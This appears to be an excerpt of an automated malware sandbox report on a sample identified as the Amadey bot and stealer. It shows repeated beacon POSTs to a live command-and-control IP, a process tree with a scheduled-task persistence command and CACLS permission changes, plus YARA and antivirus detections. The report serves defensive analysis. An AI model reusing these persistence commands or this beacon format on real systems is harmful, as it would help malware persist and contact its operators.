                  Source IP:192.168.2.5
                  Source Port:50028
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:14.447710991 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:53
                  Source IP:192.168.2.5
                  Source Port:50029
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:18.693800926 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:54
                  Source IP:192.168.2.5
                  Source Port:50030
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:22.945043087 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:55
                  Source IP:192.168.2.5
                  Source Port:50031
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:27.188958883 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:56
                  Source IP:192.168.2.5
                  Source Port:50032
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:31.450035095 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:57
                  Source IP:192.168.2.5
                  Source Port:50033
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:35.698836088 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:58
                  Source IP:192.168.2.5
                  Source Port:50034
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:39.922708988 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:59
                  Source IP:192.168.2.5
                  Source Port:50035
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:44.144380093 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:60
                  Source IP:192.168.2.5
                  Source Port:50036
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:48.409323931 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Target ID:0
                  Start time:14:52:56
                  Start date:23/11/2024
                  Path:C:\Users\user\Desktop\Week13.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Week13.exe"
                  Imagebase:0x610000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000000.2018110902.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2024090733.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe"
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.4482407558.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000001.00000002.4482643286.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000000.2023252824.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 92%, ReversingLabs
                  Reputation:low
                  Has exited:false

                  Target ID:2
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F
                  Imagebase:0x650000
                  File size:187'904 bytes
                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "oneetx.exe" /P "user:N"
                  Imagebase:0xe20000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "oneetx.exe" /P "user:R" /E
                  Imagebase:0xe20000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  Imagebase:0x790000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "..\cb7ae701b3" /P "user:N"
                  Imagebase:0xe20000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:14:52:57
                  Start date:23/11/2024
                  Path:C:\Windows\SysWOW64\cacls.exe
                  Wow64 process (32bit):true
                  Commandline:CACLS "..\cb7ae701b3" /P "user:R" /E
                  Imagebase:0xe20000
                  File size:27'648 bytes
                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:13
                  Start time:14:53:01
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000002.2072680147.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000000.2068747205.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  Target ID:16
                  Start time:14:54:00
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000010.00000000.2659622976.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000010.00000002.2661827573.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  Target ID:17
                  Start time:14:55:00
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000011.00000000.3258747374.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000011.00000002.3259452857.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  Target ID:18
                  Start time:14:56:00
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000012.00000002.3859111470.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000012.00000000.3858755574.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  Target ID:19
                  Start time:14:57:00
                  Start date:23/11/2024
                  Path:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Imagebase:0x890000
                  File size:209'950 bytes
                  MD5 hash:A1B8FA53A47B1991EE76A46EE8685B7D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000013.00000000.4459397310.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000013.00000002.4464203230.0000000000891000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:true

                  No disassembly